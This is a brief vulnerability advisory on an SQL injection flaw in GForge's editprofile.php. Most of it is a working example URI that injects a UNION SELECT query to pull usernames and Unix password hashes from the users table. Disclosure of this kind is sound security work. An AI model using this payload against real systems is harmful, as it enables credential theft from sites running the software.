GForge Topic EditProfile.PHP SQL Injection Vulnerability

GForge Topic EditProfile.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/www/people/editprofile.php?skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete